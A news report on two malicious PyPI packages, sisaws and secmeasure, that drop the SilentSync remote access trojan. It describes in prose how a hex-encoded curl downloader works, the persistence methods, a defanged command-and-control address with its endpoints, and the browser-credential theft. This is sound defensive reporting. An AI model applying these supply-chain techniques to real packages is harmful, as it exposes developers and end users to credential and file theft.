Cybersecurity researchers have discovered two new malicious packages in the Python Package Index (PyPI) repository that deliver a remote access trojan called SilentSync on Windows systems.
“SilentSync is capable of remote command execution, file exfiltration, and screen capturing,” Zscaler ThreatLabz’s Manisha Ramcharan Prajapati and Satyam Singh said. “SilentSync also extracts web browser data, including credentials, history, autofill data, and cookies from web browsers like Chrome, Brave, Edge, and Firefox.”
The packages are no longer available for download from PyPI; they are listed below. A user named “CondeTGAPIS” uploaded both of them.
- sisaws (201 Downloads)
- secmeasure (627 Downloads)
Zscaler said the package sisaws mimics the behavior of the legitimate Python package sisa, which links to Argentina’s national health information system, Sistema Integrado de Información Sanitaria Argentino (SISA). However, the library contains a function called gen_token() in the initialization script (__init__.py) that acts as a downloader for next-stage malware. Specifically, it sends a hard-coded token as input and then receives a secondary static token in a manner that resembles the legitimate SISA API.
“If a developer imports the sisaws package and invokes the gen_token function, the code will decode a hexadecimal string that reveals a curl command, which is then used to fetch an additional Python script,” Zscaler said. “The Python script retrieved from PasteBin is written to the filename helper.py in a temporary directory and executed.”
Similarly, secmeasure masquerades as a “library for cleaning strings and applying security measures,” but it contains embedded functionality that drops the SilentSync RAT.
SylentSync
SilentSync primarily targets Windows systems at this stage; nevertheless, the malware also includes built-in features for Linux and macOS. For example, on Windows it makes Registry modifications, on Linux it alters the crontab file to execute the payload at system startup, and on macOS it registers a LaunchAgent.
The package requires the secondary token to send an HTTP GET request to a hard-coded endpoint (200.58.107[.]25) so it can receive Python code that executes directly in memory. Consequently, the server exposes four different endpoints:
/checkin, to verify connectivity/comando, to request commands to execute/respuesta, to send a status message/archivo, to send command output or stolen data
Moreover, the malware can harvest browser data, execute shell commands, capture screenshots, and steal files. It can also compress and exfiltrate files and entire directories as ZIP archives. After it transmits the data, the malware deletes all artifacts from the host to evade detection.
“The discovery of the malicious PyPI packages sisaws and secmeasure highlight the growing risk of supply chain attacks within public software repositories,” Zscaler said. “By leveraging typosquatting and impersonating legitimate packages, threat actors can gain access to personally identifiable information (PII).”
Source: TheHackerNews
Read more at Impreza News
